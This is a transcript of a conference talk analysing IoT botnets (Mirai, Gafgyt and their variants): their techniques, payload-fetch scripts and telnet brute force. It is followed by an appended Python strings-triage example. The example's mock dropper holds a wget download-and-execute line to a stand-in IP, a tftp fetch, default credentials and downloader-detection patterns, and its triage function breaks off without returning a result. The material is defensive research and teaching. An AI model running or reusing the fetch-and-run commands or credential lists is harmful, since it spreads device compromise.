Hello. Hello. Hi. Good afternoon. I am happy to introduce Adi Sood, who is going to be speaking on IoT botnets, the crux of Internet of Things chaos. Please give a warm ToorCon welcome to Adi.

First of all, welcome everyone, and thanks for taking the time to attend this talk. For the next 40 to 45 minutes I hope we are going to have a good topic in our hands to discuss, so let's get it started. Today we are going to talk in the context of IoT botnets. We are going to delve into a couple of the botnets that we have analyzed earlier, their techniques, tactics and exploitation mechanisms, and then we have a few videos down the lane to give you a feel that what we are talking about is really happening.

A little background on me, just to help you understand where I belong and what I do as a part of my research. I drafted a book called Targeted Cyber Attacks. It got published in Chinese as well; it is an idealistic approach to how to go after and analyze cyber attacks and everything. I am going to lay out a little disclaimer: all the research that we are going to talk about or present during the course of this talk relates in no way to my employer, and the reason for that is that this is the kind of work that is done in your free time, as a motivation to share intelligence with the security research community, so I don't want it associated with the employer. So let's get into it.

This is a realistic picture of our e-world these days. What that means is that more of these end devices are interconnected in nature, and we will take a deep dive into that later on as well. The idea behind it is that data movement is happening at a rapid pace.
The number of devices has increased significantly; data processing, storage and movement are exponential these days, and the reason behind that is that with the revolution, call it the mobile revolution, of the last couple of years, more and more devices exist, and they are interconnected through the internet, different protocols, Bluetooth and all that; there is an interconnectivity somewhere. That means that the attack surface is getting enlarged, and that is the more important part, which the adversaries or nefarious actors are going after. This research layout here actually gives you a glimpse of how it looks. A couple of years back, we're talking about 2000 and all that, we talked about like 0.5 billion devices; right now, within the last 10 or 20 years, we are talking about close to 50 billion, which is going to be by 2020. So you can see how much the number has increased, tremendously, which means these devices are interconnected, so the attack surface has increased, and for adversaries who are sitting on the internet and believe in just spawning systems and all that, it is the kind of launchpad that you want to go after, right.
More devices: easy to form botnets, easy to go after a large section of the people on the internet, and then perform various operations. But that actually is the picture we are going to draft when we try to talk about threat models and all that: we want to see, with the passage of time, what has been changed, what has been increased, and where it is moving forward.

So let's talk a little bit about the Internet of Things. In different terminology, sometimes we call this the Internet of Things, some people call it IT plus OT, depending on the things, I think, but there is not enough clarity on that part; it is just a generic outline. Internet of Things: everything is comprised in it, because these things have interfaces that are connected on the internet and they are communicating with each other. But again, we live in this world and all of that, and just a few minutes later we are going to discuss a taxonomy so that we can dissect it accordingly, because we need to go after architecture, we need to go after either device type, or we need to go after exploitation scenarios. So let's get started.

These are a couple of snapshots I took from the media outlets to give you the reality of the IoT space. Security is nothing new, but the question is, are we really doing it? That's the question that is in front of us. If you look at a couple of these news articles, they talk about different IoT botnets that came to exist. There was the Mirai one, which was the first one, the major one, but then there is the Reaper IoT bot, the JenX bot and all that. What it interprets is that threats are real: attackers are really going after these devices, whether it's routers or switches, whether it's the kind of audio/video conferencing systems, any kind of smart device, a refrigerator, other systems that are connected on the internet; that is a potential target for the attackers to go
after. But the threats are real. Before moving further, I think it is really important to understand the taxonomy here and why it is important, because of the way malicious code is written. The authors have to come up against certain kinds of stringencies, which means they want to draft code which works on all sorts of platforms, because when they run or conduct a broad-based attack, the challenge is that they really want a scenario where they just distribute the code, let it run, and there should not be any kind of constraints from going after different device types and all that. Looking into this, you can build different kinds of taxonomy: it can be based on device type, you can have code drafted based on architecture, or on different characteristics and functionality; you compromise a certain set of devices, and what are you going to use those devices for, network communication and sorts of things like that. But what we have seen recently is that most of the malware authors are really going after architecture-specific code rather than some sort of device type, because what they are doing is that they want to really go after the underlying layer, whether it's a Linux x86 platform or any kind of platform, and that makes it easier for them to draft code and run it over a continuous period of time. If they go after a standard device type, okay, this is only going to go after standard kinds of Cisco switches or a kind of Wi-Fi routers and all that. Those kinds of attacks also persist, but when they need to go after millions of devices, they have to make code which is not device-type dependent but based more on the functionality type or the architecture type.

So let's go through a little bit of the IoT botnet attack model. The very simple thing is: okay, distribute the code. In the earlier taxonomy we discussed, they are not going to
have the device type but mostly the architecture type. So you can see that they have switches, they can have video cameras, stuff like that, a different set of routers. The notion is: distribute the code, get the system compromised, build a botnet, and then start launching the attacks they want to do. One of the easiest interpretations of the way IoT botnets are built is that the compromised devices are used for triggering chain attacks as well. What I mean by that is that once you have a set of a hundred or 200 compromised devices, they can launch an attack and try to build or formulate more bots into it by launching Telnet scans, stuff like that, and we are going to show it in a demo down the lane as well. But considering this, for any threat modeling anyone wants to do in the field of security, I think taxonomy is the most important part to go after, because that actually gives you the idea of how you are really going to dissect one specific space in security.

So we talked about the IoT taxonomy, we have gone a little bit through the IoT botnet attack model and all that. Let's just take a quick look at how compromised IoT devices are being used. Of course, building botnets; launching distributed denial of service attacks; we have been talking about Bitcoin mining these days as well, they are used for mining as well. One of the interesting scenarios where they build a stealthy attack flow is to transform your routers, transform your IoT devices, into a stealthy proxy, which means that they have SOCKS, they can set up a reverse proxy, and once you go through it you can get it done. And then there is of course mining cryptocurrency and several other kinds of nefarious operations that they love to perform, because the devices don't belong to them; they have the power, they have everything set up, they want to perform certain activities on the internet that result in financial gains, or maybe for fun purposes. But that is the idea of
how the taxonomy, the IoT botnet attack model, and what it looks like to be a compromised IoT device.

Now, before moving further: the way we have drafted this talk is based on reverse engineering that we performed. We analyzed the code samples and stuff like that, we have picked up the code samples where that particular technique is implemented, and we are just going to discuss that technique looking at the code. The idea behind this layout is that we want to say, hey, we have analyzed a real set of code; the techniques that we are going to discuss really exist in the wild. So let's take a look at it.

The first one, so we are going to connect the dots as well with what we discussed earlier: in the IoT botnet taxonomy we talked about how they want to formulate code which is basically architecture-specific, which means that they have to do cross-platform compilation. Without that it's really hard, because you can have code on x86 but it's not going to run, maybe, on the MIPS architecture. So they need to somehow harness the power of open source projects, build it, and then do the cross-platform compilation, and we are going to talk about a couple of the Mirai variants a little later as well. So if you look at this code snippet, what they are trying to do is go through different architectures and build the binaries for them, whether it's ARM, x86, MIPS, SPARC, PowerPC, whatever it is, and then they have separate code for how they are going to fetch the payloads and bins and all that. But cross-platform compilation is a very important aspect for malware authors these days.

Let's take a look further at the different functionality we call distributed denial of service functions. Of course, once you build a botnet you really want to launch some set of attacks, right,
because these are bots formulating a botnet; of course, distributed denial of service attacks are going to be there. When we analyzed, there can be multiple: the DDoS attack can be at layer three or four, which is the TCP, UDP or IP layer, and then they can be at layer seven of TCP/IP, which is actually the HTTP layer. So they can go after some flooding, different kinds of sets, but they have this built-in functionality, and this code actually tells how they fork the process and then have it in a chain reaction: trigger it, give the guidance to the different bots there, and trigger the attack on a dedicated target. They are actually going after this kind of DDoS functionality. This is nothing new, but the important part is that it still persists, and that's why whatever new botnets are being formed still have this functionality.

Taking a little deeper look into the different kinds of denial of service attack variants: there can be TCP attacks, UDP, as we talked about, either at layer three or four or at layer seven of the TCP/IP model. But it works pretty well. Basically, attackers simply compromise the system, and they are just going to go after it because they can harness the power of that system and do whatever they want on the internet. This is kind of a de facto standard in most of the botnets, whether they belong to IoT or to any different sphere.

Now let's go further and talk about bot kill, what this technique is all about. We always talk about fights going on and all that, but bot wars also exist in this space, where different adversaries form different botnets and want to make sure that their control is much more than the other person's, which means that they have to draft code in such a way that, let's say they install it on one of
the compromised systems, they have to actually scan through the listed processes or some other artifacts on the system to make sure that this particular compromised device doesn't belong to any other botnet. If it does, just go ahead, trigger the commands, kill it, make it yours, which means that these guys are performing wars as well. The technique they use in doing so is that they are actually scanning some binaries, checks and all that, and once they find, okay, this compromised device doesn't belong to me, but I found an artifact that is from a different botnet, kill those things, make it reboot or use some other set of functionality to control that compromised system and make it a part of your own botnet. So bot kill is a very important feature in the way malicious code is designed in the underground community.

Another interesting technique they use is a kill-all functionality. Sometimes they are scanning the processes, looking into different indicators in the system, but then they find that there is no way to actually kill that infection. So what they can also do is simply go ahead, kill the standard processes, reboot the system, and try to see if another bot that is sitting somewhere can rescan it, get it back into that system, and then make it a part of it. But again, this is a very interesting technique as well: just go ahead and kill everything, get complete control, and then from there onwards just roll the infections in a different way. That's the way it is being done, but these are the kind of standard functionalities that these bots and their inherent malicious code have built in.

Of course, moving forward, the reverse shell is very much important, because sometimes what happens is that we have network perimeter devices lined up, there's ingress/egress filtering going on, ports might get closed and all
that, so attackers or adversaries don't lose control, right. So what they come up with is a different technique; this is also a technique that is being opted for by different botnets as well: just implement a reverse shell, either a SOCKS proxy or some other kind of thing. What it means is that it actually helps them to bypass the scenario, because the connection is initiated by the reverse shell rather than as a direct connection from external to internal, which, with the firewalls and other network perimeter devices, is not possible. This code actually states that some of the botnets, basically IoT bots, also come up with this kind of functionality: trigger a reverse shell so that the attackers still have control over it, and whatever updates they want to perform and things like that, they can go ahead and do it.

Now we try to look at a little bit of different functionality from the perspective of how they are writing this malicious code. Sometimes there is no fun in reinventing the wheel, right, and that's why, from this part of the analogy, it comes out that adversaries actually draft code that harnesses the power of open source packages as well. We have seen that they are directly picking the bot package from GitHub, embedding it, running the scripts and performing the functionality. What we have seen earlier, or even right now, is a couple of these standard open source packages, ones with a smaller size, compressed ones, being used heavily. BusyBox is heavily used because it's going to give you the power of a portable binary, where you can simply call BusyBox and then run a different set of commands. So the BusyBox package, the open source one: you get the compiled binary, call it, call the functions, triggered in the firmware, and then
actually run different things.

Another interesting software package is Dropbear SSH. It's a very custom, very compact SSH client/server binary, and again the idea in this part is that at some point in time they want to open an SSH port or some kind of those activities; basically, they have to perform remote administration at the end of the day, and for that they really need some kind of remote access protocol to be in place. Either it can be Telnet, or they really want to say, I need SSH access into that, so they really harness the power of this package as well. We will take a look down the lane in our video demonstration, but these packages are really, really important from their point of view, because they just call them directly, enhance the functionality of the bot, and perform whatever operations they want to in an unauthorized fashion.

Another interesting scenario, so we are going to connect the dots back to our IoT botnet taxonomy, where we talked about how whenever they want to draft code they actually want to go after architecture-specific code, for which they have to do the cross-platform compilation, right. But how can they do it? Still the answer is the open source packages that are available. Nonetheless, these packages are not bad; they are designed for some specific set of functionality, but again, this is the way our cyber world works: some of the good things can be abused in a different way to perform unwanted operations. So with Aboriginal Linux and all that, the way it is designed, you can still compile the binary in a cross-platform way and then just call the binary, call the functions, compile it, and then you have the binary available; you can run it on any architecture, it will pick up the artifacts from that system, it won't stop, and it will install. That's the way the malicious code is being done, because sometimes, the way botnets are performed,
they might not go after targeted attacks. When we talked about targeted attacks earlier, we were talking about people going after a specific organization or some different set of people, right, but when broad-based attacks are there, they want to go after thousands of routers, millions of IoT devices. This one is done on the blind, right: whatever comes in forms the botnet; go after it and do the unauthorized operations. But three packages, apart from the standard Linux utilities like wget, curl and all that, these three packages, the Dropbear SSH client, BusyBox and the Aboriginal Linux one, are heavily used these days, and if you even surf the internet within the last week and all that and try to look into the news in the IoT space, all the people are talking about that.

And then further, of course, we know malicious code is written in such a way that people want to have some kind of obfuscation or encryption in place, right, so if you perform reverse engineering it's just a bit hard to dissect the code. Maybe it's not an advanced level of encryption that these malware authors deploy in the malicious code, but again, at the end of the day, there is some kind of thing they still deploy with respect to obfuscation. So while we were analyzing the code and all that, after pen testing certain servers where we were able to get that code, you can clearly see that this code actually states that they are using XOR obfuscation and all that. It might not be that advanced, but still it served the purpose to some extent. But they definitely deployed data encryption and obfuscation strategies as well.

Now, moving forward, is device architecture detection. We talked about compiling the code in a cross-platform way, but before that, when Aboriginal Linux was there and they found out that, hey, we can use this package to do this kind of functionality, earlier they still had some kind of
embedded code in place, which means that before the standard code, the malicious code, the payload, is actually going to run on the system, they want to detect the architecture. Again, the idea is that they don't want to actually get detected and things like that. So if it's x86, pick up the x86, call that code, or use wget to fetch the x86 code, download it, run it, and get it infected, and things like that. Of course, with the passage of time, things are getting enhanced; more and more new techniques are coming up, but this was a part of the policy as well, the way they designed the malicious code earlier. Just to give you a quick feel of it, after analyzing a couple of these IoT bots and all that: embedded strings. These are a couple of standard Telnet embedded usernames and passwords. These guys love to go after Telnet, standard Telnet devices. They pick them from default passwords and all that, build up the strings, and it can be either embedded in the binary itself or it can be a separate file which they call and then trigger things. But again, at the end of the day, the important part in this context is: look at the way IoT bots are formed; the malicious binary has so much in it, right. The different techniques we talked about: bot kill, the device architecture detection code, the DDoS code and things like that, and then the scanning, because they have to build bigger botnets, so they actually have to go after other bots, basically other systems on the internet, so that they can be a part of the primary bot.

So now let's take a look at what I was talking about here, how they are going to fetch the binaries and all that. If you look at this particular code, it's basically standard bash scripts that are being placed on that compromised device and allowed to run. They can simply go after the remote domain which is being controlled by the attacker, and what I
mean by that is that the attacker has full control; they can deploy any code, change or reiterate the code at their convenience. So you just run that bash script on that system, it's going to fetch the payloads from the remote location, and you can see it's going to change the mode, make it executable, tied back to the architecture, whether it's the MIPS architecture and all that, and then clean it right away as well, because they don't want to have any kind of leftover fodder there once they actually execute the code. This is the kind of thing we found out on the internet and all that, or even when you try to test certain domains you get access to certain code as well.

Similarly, on this benchmark, if you look at the other code, a little bit different, you can look at how they actually constructed the resource, the payload. The payload is basically a simple iteration of three alphabet characters, Qbot and all that. We are going to look at it down the lane as well: we analyzed a Mirai bot, but there was a Qbot as well with different functionality, but you can clearly see how they are actually structuring the payloads, the naming convention and all that: make it executable, then go after it, delete it right away, so that there will be no traces on the system. The idea is that you can clearly see the way they were going after it: they want the infections, but they don't want to have any traces on the system as well, in case somebody comes in and looks. If we connect the dots, these kinds of things also help the advanced attackers to actually beat the bot kill feature as well, because sometimes they want to look at certain standard indicators which might not be there, because after the execution they have removed them. So it's a kind of arms race, as we always used to call it, right: somebody has to get it done, somebody is behind, but it's an arms race at the end of
the day.

Let's take a look at the kill-all thing. We discussed the kill-all functionality earlier, but they can also implement that functionality in the form of scripts as well. You can clearly see it's a simple bash script performing that kind of process operation: maybe scanning through the process list, performing some kind of operations to make sure that no traces are there; if they don't find any traces, go after and kill it: I want a clean system, I will reboot it, and because I have multiple bots running differently, and this was a part of an earlier botnet, I can rescan it, reboot it, and then I can get access to that device again. So these different functionalities keep on persisting, and that's the way they are able to build botnets, and they are still able to go after building botnets every day, despite us thinking we have done enough in security; exactly, that's not the case.

Again, another variant of the same kill-all functionality: you can clearly see how the bash script is being called and all that, and on the left side they are going after the CentOS SSH daemon and then performing some logic to make sure the infections are right. So the whole purpose of showing you the code during the course of this presentation is to make sure that we are not only talking about the techniques; we have analyzed them in detail, and there is standard evidence available which actually proves that these techniques are real and exist in the real world.

So let's take a little bit of a deep dive into the next part. We are going to refresh what we have gone through in the last couple of slides, and then we will delve a little bit into the real-world examples, to try to show you that the stuff exists and how bad it is, even from the incident response point of view, whether you are doing a security assessment of certain devices and all that, how these attacks look different when you are analyzing at the
network level or analyzing the low-level debug code and all that.

So let's start. There are certain variants that came to exist a few years back, but Mirai was the most important one, which actually set the baseline to build more IoT bots. Somehow the source code got leaked earlier, and people picked that code up; again, if we connect the dots, nobody wants to reinvent the wheel, just transform it, add more code, write and deploy more C code, Python code, shell scripts, just enhance it and then deploy it, and we will take a look into that as well.

Just to reiterate what we have gone through, I want to go through the execution flow model here. The idea is to compromise the device, go ahead, fetch the malicious payload, of course obtain system privileges by exploiting a vulnerability, performing some privilege escalation on the system, of course launch attacks (I mean, the system got compromised, they have to launch attacks) and expand the botnet. At the end of the day, once you expand your botnet, whether you want to use it for financial gains or for some different purposes: in the underground cyber community they can rent this botnet out to perform a different set of attacks, trigger some phishing, different kinds of things they can perform; this is like renting a botnet as well. So we got a bit of an easy feel of how the execution flow model works.

The next thing we want to go after is some of the real-world examples. There will be some screenshots; these screenshots were taken when we performed the security assessments: how we got access to those domains, downloaded the malware, did some different analysis, tried to get a feel of it. Different techniques were opted for, because if you really want to go after analyzing a malware, it's not only one technique that you have to go after, whether it's
static analysis, dynamic analysis, or you have to perform some kind of security assessment of the remote domains; of course, intelligence gathering you have to perform. But I always call this a multi-threaded approach, right: you have to have different analytical threads there to come up with a standard, strong scenario.

So let's take a look at the first one. If you look at this slide here, you can see that we are talking about the variant called Bleed Street; of course, different architectures, there's an ARM one, ARM5, MIPS, x86 and all that. The question is how you get to it, how you actually get access to these particular domains, and there are many different ways you can go about it. There was a technique known earlier: people deploy honeypots as well and they fetch from there, but there are other ways you can go after finding these things out, for instance when you pen test remote C&C servers. You get some indicators from there, you try to connect the dots, go after the different remote domains, get an idea of it. But apart from that, the point is that you then get access to the domain which is hosting, providing a directory listing of these different binaries, and you can see that once you run the file command and things like that you get a feel of which architecture it belongs to, and it's all executables. I really don't want to go too much into reverse engineering during the course of this talk, so we did basic checks and all that to actually give you a feel that those are the infected ones. So if you look at the strings check, the one that I have not shown here, I have basically highlighted in red: it's just a hard-coded IP address in that ARM binary, so when that binary is going to execute on the compromised system it is going to go to the attacker-controlled
domain, fetch it from here, and then get all the malicious packages, payloads, dump them on it, install them and run them on the compromised device. So while you perform an analysis and you get access to that, at least you come to know about that IP address, and then you can start your assessment on that IP address from a different sphere.

Just enhancing the same scenario with the latest example, the Gafgyt Mirai variant: it is actually an attack that is going on right now. Somehow I was doing some research last night and we came across this thing; I don't want to show it in real time, but this attack is right now going on. You can see that once you get access to it, again the directory listing, but there are different binaries, and you can clearly see there is one called apache2 as well, which is a binary, but then you can see there is an infected.txt file, all the infections and sorts of things like that, which actually contains a record of compromised IoT devices, or the IoT devices they are going to scan. So you dump apache2 and then you perform a little bit of analysis on the strings and try to get an initial feel, stuff like that, and then you do a little bit of a check in the background with some intelligence feeds, and you get a feel that, okay, this is the Gafgyt Mirai variant and it has an embedded shell script, and I want to show you that as a part of the demonstration.

So we are going to look at a very quick demo; it's a very basic check. We didn't want to talk about how we get the binaries and stuff like that; we had the binaries and we want to show how things look when those are embedded in. Let's take a look at the video. So we dumped the three binaries we were talking about from there, and just try to run the file check; it's going to give you how it's compiled and all that. But I was damn interested in apache2, because when the Equifax attack happened earlier,
um it was a struts vulnerability so we would just want to check if they are building this apache binary is it just a legitimate struts exploit or is just like kind of they're using this terminology to bypass certain scenarios so you just simply run the strings try to get a little bit indicators so you see that embedded c code is there we were not interested in too much into it what we are looking forward is the embedded bash script into it okay we've got access there's a firmware one keep on scrolling so there is started giving you some good uh you know strings here which we're going to look at you know ping pong my ip scanner stuff like that and now there is starts up you can see that couple the embedded username passwords here and then the shell so somehow i have not actually i have actually led the ip address to stay there if you want to perform some stuff down the lane you can go ahead and do it as well but do you want to delve into the more reverse engineering where you load the stuff into idapro and do the static code but it gives you enough to believe that you know this apache 2 binary is a problematic one and how you really need to go to go after and perform next set of analysis so now we're just stacking connecting the dots back again we checking the drop beer binary it is there we checking the blue get it is there and things like that so these are like a quick and dirty analysis uh yeah sometimes you have to go a little bit more deeper into it but at the end of the day once you get these indicators you try to connect them go after the bigger sphere and then go after you know how what a kind of other um uh compromised devices that are somewhere attached to this kind of scenario let's move a little bit uh further so in this particular screenshot it is one of the audio video conferencing devices are like a kind of very big company uh so we were testing certain things we got uh somehow we got an access to their debug interface and things like that but this 
actually shows that when you have to perform analysis at that level what kind of stuff you have to go through right so you get a lot of these you know memory addresses coming in you know kind of modular calls are being called functions are being you know called and then because anytime in that device a single function is being performed the debug logs are throwing a lot of garbage stuff into it but you have to actually extract the ones that you want in this particular screenshot I have a demo as well to prove this artifact this actually shows that whenever something is happening on that device there is a some wkit calls are being issued the shell scripts are being run and at the back end it's fetching something kind of bad things like a bad payloads and it's getting installed and things like that so you extract somehow you are able to extract the payload you can still run it by third party service try to get a feel of it whether it's a known one or it's the the variant of the already existing one so you get a feel of it like this is still a malicious one the shell scripts the kind of payloads they are fetching are malicious so we found different variants of mirai as well but these variants like we're targeting a very well known audio video conferencing systems let's take a look so if you look at this particular screenshot right we're talking about the anarchy bot here from the top if you look there are like three commands are being actually issued right started from the session is registered and they actually go gonna go after you know default enable system and these are some of the commands they run in a iterative way hierarchical way to get perform some kind of privilege escalation or to get a control of certain set of binaries by calling these commands and then they actually go into shell mode with the SS command and then their inherent code starts triggering up the scenario so if you look at the bin busybox one again the open source package it is calling the 
anarchy payload here and they're going to perform some different kind of things and if we really look back with that topic we discussed no need to reinvent the wheel so they still use the mirai code but the variant is a little bit different the standards are the same but they're performing different set of functionalities let's take a look at the another variant this one is a cult bot right similar scenario similar things found on the some another deployment of the the compromised audio video conferencing system there was a you know available on the internet in this particular scenario variant they treated it as a cult one but whole scenario going into the mode enabling system shell is the same as mirai let's go into another variant the sorrow bot again the scenario is the same but the payload is a little bit different so they might want to perform some kind of different activities which are not in line with the mirai one and we just came to know like you know the person who drafted this or I think it's in the media I think the guy has been you know somewhere it's been prosecuted one or the other way by the legal authorities been custody but the caution here is that source code is there I don't need to reinvent it and they are not doing it exactly now we are extending it to expect to the next level and what are we going to talk about right now is a brute force scenario so there was a compromise device it triggered a different kind of variants now what exactly it is supposed to do it is supposed to launch brute force attacks and if you can clearly see again there's a lot of debug logs how will you figure it out when you're doing research because sometimes you are not on the same network sometimes you might be on the same network but when you access to these kind of debug interfaces and all that how you'll figure it out so you have to find indicators you have to look for the artifacts and when we're doing the research looking into it and you can clearly see which 
module which is called as an AVC is a video controller audio video thingy and they have certain kind of functions embedded in and they have like a telnet function in itself as well they call that function once I've actually so if you look at the top there is a telnet underscore client they register the telnet session and they start reiterating with the embedded username or password and start initiating telnet connections or brute force attack or password cracking attempt from that compromise system and it will keep on going on for a long period of time and but when you are analyzing as a part of researcher you are analyzing into it trying to figure it out how will you come to know that these things are there again it's a multi-threading it like we used to have multi-threading environment but even with the analysis you have to look into bigger sphere you just cannot beat the bush by just few artifacts but this is a reality eventually when we do a little background research one is done it was using the root and the anchor password right you find that the anchor password was like some kind of use for some unix system so it means they they know they build this this list by looking at some of the default system that are available on the internet they're going to go after unix system and all that so you keep on connecting the things analysis will start giving you different scenarios and then from there onwards you can you know launch your analysis to the next level it doesn't make sense if we don't see the video in real time i won't say real time but i have embedded video in try to give you a feel how it looks like when you're performing analysis and let's just take a look at it so i have to you know i just remove certain artifacts from here but it actually gives you a good view it's a three minutes video but this is how it looks like when you get an access to the interface how fast the attack is moving and things like that so there's a lot of other things are happening 
in that compromise device but you can clearly see those basically indicators start popping up right this one is showing some kind of meori variant okay that's fine we're seeing seeing that okay the compromise device is performing certain kind of activity without any interaction let's just take a skip on going on now if you look at right now i will highlight it in a few seconds here so there so it creates that telnet session because the talent is redirecting to the pseudo terminal it created a telnet session and it start launching the brute force attack or password cracking attempts it is going from the real time system we are just sitting back we are analyzing the system looking into it and you can clearly see is keep on triggering the attack again there is a sport login and all that and the telnet sessions are keep on getting created next set of username password is being tried it sleeps for a few minutes triggered it again and things like that but this is all a kind of compromise audio video conferencing system no interaction nothing is just going on the fly as soon as it connects back to the internet and it is going after it halted because the sleep function triggered it now it's picking up again so you can imagine this is just a one compromise system you can imagine if you have a thousand of these compromise systems that they're going after the similar scenario that's how they actually build bigger botnets because it's just going in a distributed fashion they have the ip list where they want to create a talent they want to check the you know baseline there whether they have weak security configuration or not somehow it started showing the traces on mirai as well yeah so this is the attack they want to actually show in real time that actually these kind of things exist but when you have to perform analysis you have to look into various scenarios so so we we started with the you know why iot how what iot you know how it looks like we went through the you know 
taxonomy the botnet execution so model we went through different techniques by looking at the source code destroyers then we look into the real world examples gone through two one of the basic video demonstration of apache two how vulnerable that binary was looked into one of the audio video conferencing system but then when you still have to perform empirical analysis you still have to go and pick a few samples all the techniques that we have gone through we have to map those techniques back to the different iot botnets because we want to get a bigger picture a bigger matrix try to see how the evolve the bots are evolving with the passage of time and we did conduct a one study which we call as empirical analysis we try to pick up the you know the bots that were like the first ones that came to exist that actually got a bigger attention we went to like hajime persirai amnesia bricker one mirai linux irc idra and all that but again the question the part that we want to obtain from this research is we have a techniques we want to look into cnc architecture communication protocol you know infection strategies persistence denial of service capabilities different kind of features and how it maps back to the different set of bots right then it actually gives you a view and when you're building algorithms for detecting these kind of scenarios you need this kind of intelligence it starts from your simple analysis pen testing certain domain get some artifacts testing some real world scenarios and then actually building this kind of research layout at the end of that day to get a solid intelligence that can be feed it back to your automated detection and prevention solutions it makes sense because let's say if you want to write a signature it's just an old technique of drafting signature but you still know you know what this particular one of the variant okay that technique is not going to be good at the network level sort of things like that and some of the things which 
other researchers have worked on simple iot botnet signatures you can clearly see they pick it from it's just as some of the yara rules and all that you know get the strengths put it in you know get through the binary check whether this not there or not but the question again that we all as a researchers we need to ask is you know keep on sharing with the community at the end of the day but then on the contrary it's just not only a one thing that you have to go after it's just not only that okay you find a one compromise system you perform the analysis you share with the community we need a bigger picture as well we need to build security solutions so the intelligence need to be feed it in that way we talk about data mining machine learning natural language processing artificial intelligence but again at the end of the day you have to mine data and for data you have to have sampling performed on a bigger sets to make sure that what are you being concluding out of it is good so that being said we started with the internet of things we came back to the same scenario here the one thing that i want to highlight with the internet of things scenario is that i think maybe we have many companies out there they talk about iot security and all that i think the bigger part that we are missing is the taxonomy right when we talk about iot is it it plus ot is it information technology or operational technology is it internet of things what what is all about so we have to take it out of the marketing scenarios then okay i know in cyber security world after two three years you need to come with different marketing terminology but we need a very dedicated set of internet of things taxonomy you're categorizing into enterprise iot you're categorizing into and and user scenario where they use the iot devices so some of the things are there because if you really want to nurture and build strong security solution taxonomy is very much desired you cannot just put up a one standard 
solution and write it run for things where we come out okay there is a router it's an iot all you're running is a white listing on the top of it so that's how you can't defeat the way botanists are being deployed and designed so that being said we still have three minutes questions so again it depends on the so i'm gonna repeat your question again so that everybody knows about it so i think he's asking have we seen any kind of advanced botnets where they actually go after when we talk about payloads they go after root kits deployed in which are undetected in nature right so i think i'll start it in the context of when we perform experimental analysis right so idea is that you know we look at the volumes of attacks right we can still say that in this world that anti-virus is dead but still at the end of the day malware keep on coming and things like that the traces that we have seen looking at the architecture because a nix-based architecture and all that most of the that thing that is little bit derived towards the volume level right so the volume that we are seeing with that kind of mirai variant and all that is the techniques but on the contrary the question is how many scary solutions are being deployed to detect the risk in these kind of devices like routers who check you know you have exposed and things like that and at the end of the day right i'm not and like totally negating the fact that there will not be those kind of root kits but the volume is not that high so when we derive analysis build solutions will go after where you can detect something on the fly rather than just waiting for those scenarios and linux root kits we have like you know tools like earlier rootkit hunter and all that you know sac hits and all that behavior file integrity monitoring and all that but again at the end of the day it will eventually come and the volume will increase as soon as the advanced security solutions come to play because if you don't have advanced security 
solutions they are getting the work done with the same period of like same set of code and why they really need to go after building advanced rootkit code and all that but there will be some samples down there which are undetected will be running in the wild that's what we really need to find it out hope i'll answer the question not exactly so if i'm getting your question right is like if we have like additional set of packages installed like gcc and all that which might make it difficult for the malware authors to deploy the code yeah yeah so no exactly these are the couple of open source packages that we discussed here but eventually the one thing that we have analyzed during the course of this research is that they are already also utilizing those bindries as well for their own purposes right that's why if you look at the some of the pre-compiled bindries and all that it's not necessary they're always using wget or ftp and tftp and all that they are using like these kind of standard curl bindries as well because the question there is they want that thing package to be available on the compromise device and you can still use to fetch the payloads on the fly so those are the things that are there i don't see the question again boils down to the one part all these devices how many security solutions are placed to prevent infections and audio video conferencing systems that's the question that really are these kind of audio devices and not enough all they're relying is on a signature based white listing and all that you know if it hits on a malicious ip stop it but i think this this problem is going way beyond that right now i mean i'll be around if you have any more questions thanks everyone for attending this talk i appreciate that
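The quick-and-dirty triage the speaker walks through for the dumped apache2 binary (run strings, look for the embedded shell script, the wget/tftp download commands, the credential table, the "enable/system/shell" telnet sequence and the ping/pong keepalive tokens) can be turned into a repeatable first-pass check. The following is an added Python example written for this edit; it is not code from the talk, nor from any of the botnets it names. The binary it scans is a constructed byte string that only mimics what the speaker describes, the busybox marker BOTKEY is hypothetical, 198.51.100.7 is a documentation address, and the default-credential set is a small illustrative list, not a real bot's table.

```python
import re

# Constructed stand-in for a dumped dropper binary. Not a real sample: the
# byte ranges mimic machine code, and the readable runs mimic what the talk
# found in the "apache2" binary (embedded shell script, downloader commands,
# a credential table, the telnet login sequence, C2 keepalive tokens).
# 198.51.100.7 is an RFC 5737 documentation address.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01\x00" + bytes(range(256)) * 2
    + b"#!/bin/sh\x00"
    + b"cd /tmp; wget http://198.51.100.7/bins/apache2 -O apache2; "
      b"chmod +x apache2; ./apache2\x00"
    + b"tftp -g -r bot.mips 198.51.100.7\x00"
    + b"/bin/busybox BOTKEY\x00"  # hypothetical busybox marker, assumption
    + b"root\x00admin\x00admin1234\x00support\x00support\x00"
    + b"enable\x00system\x00shell\x00sh\x00"
    + b"PING\x00PONG\x00"
    + bytes(range(255, -1, -1))
)

# Constructed benign control: a stripped utility with nothing of interest.
BENIGN_BINARY = b"\x7fELF\x01\x01\x01\x00" + b"Usage: %s [options]\x00libc.so.6\x00"

DOWNLOADER_RE = re.compile(r"\b(wget|tftp|curl|ftpget)\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
BUSYBOX_RE = re.compile(r"/bin/busybox\s+[A-Z0-9]+")
LOGIN_SEQUENCE = ("enable", "system", "shell")  # Mirai-style telnet escalation
# Illustrative default-credential tokens; a real check would use a full list.
DEFAULT_CREDS = {"root", "admin", "admin1234", "support", "guest", "user", "password", "12345"}
KEEPALIVE = {"PING", "PONG"}


def extract_strings(data, min_len=4):
    """Like `strings`: every run of at least min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage(data):
    """First-pass verdict from strings alone, before any disassembly."""
    strs = extract_strings(data)
    uniq = set(strs)
    found = {
        "downloaders": sorted({m.group(1) for s in strs for m in DOWNLOADER_RE.finditer(s)}),
        "remote_hosts": sorted({ip for s in strs for ip in IPV4_RE.findall(s)}),
        "shell_script": [s for s in strs if s.startswith("#!") or ("cd /tmp" in s and "chmod" in s)],
        "busybox_cmds": [m.group() for s in strs for m in BUSYBOX_RE.finditer(s)],
        "login_sequence": all(tok in uniq for tok in LOGIN_SEQUENCE),
        "default_creds": sorted(uniq & DEFAULT_CREDS),
        "keepalive": sorted(uniq & KEEPALIVE),
    }
    # Each non-empty indicator class counts once; three or more is enough to
    # justify the deeper (IDA) pass the speaker mentions.
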